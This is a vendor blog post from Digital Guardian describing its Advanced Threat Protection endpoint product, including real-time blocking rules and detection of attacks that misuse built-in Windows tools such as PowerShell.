The Most Comprehensive Data Protection Solution

Discover, classify, and protect your data from all threats with the only Gartner Magic Quadrant DLP and Forrester Wave EDR Leader.

First and Only Solution to Converge:

  • Data Loss Prevention
  • Endpoint Detection and Response
  • User and Entity Behavior Analytics
DATAINSIDER

Digital Guardian's Blog

Inside Digital Guardian's Advanced Threat Protection: Part Three



In today's blog, the last in a three part series, we break down what differentiates Digital Guardian's Advanced Threat Protection capabilities from other endpoint detection response products. Read the first part in this series here and the second part here.

Advanced Threat Protection:

What differentiates ATP from other EDR type products is its ability to not only detect, but actually block activity in real-time. If your signatures and detections are all server-side and generated after logs have been sent up, this is not Real-Time. Adding in the ability for Real-Time Prevention is the ultimate goal in order to successfully thwart impending attacks. Digital Guardian’s ATP product has this capability via the rules engine. It can also block based on any component of metadata observed within the logs. If you want to block a binary that has a specific Signature Issuer because it’s been recently reported that the signing Company has been compromised, no problem! If you want to block binaries that have no Company Name, Product Version, and are executed from a temporary directory; no problem! Our rules engine can do all the above and then some, which puts the power into your hands, and not just what your security vendor tells you to block on. 

ATP is by no means considered a full Anti-Virus replacement. Although it does a great job at detecting malware, it’s really designed to be much more than that - covering gaps that are commonly missed by traditional AV. A great example of what AV misses is the common misuse of built-in Windows commands being used for nefarious purposes. If an email attachment contains a malicious piece of JavaScript that simply calls on PowerShell to download and execute a binary from the internet, ATP has the ability to detect that entire attack cycle. It can also continuously be extended as new threat intelligence is acquired or new tactics, techniques, procedures are observed in the wild.

Ultimately leveraging both Real-Time Detection and Historical Detection capabilities provides a more encompassing and layered approach to host-based threat detection. Digital Guardian’s ATP technology employs both to ensure incident responders and security analysts are well equipped to deter, detect, and neutralize cyber-attacks.

Tim Bandos

ANALYST REPORTS

Gartner 2017 Magic Quadrant for Enterprise Data Loss Prevention (DLP)

Tim Bandos

Tim Bandos, CISSP, CISA is Vice President of Cybersecurity at Digital Guardian and an expert in incident response and threat hunting. He has over 15 years of experience in the cybersecurity realm at a Fortune 100 company with a heavy focus on Internal Controls, Incident Response & Threat Intelligence. At this global manufacturer, he built and managed the company’s incident response team. Tim has a wealth of practical knowledge gained from tracking and hunting advanced threats targeted at stealing highly sensitive data.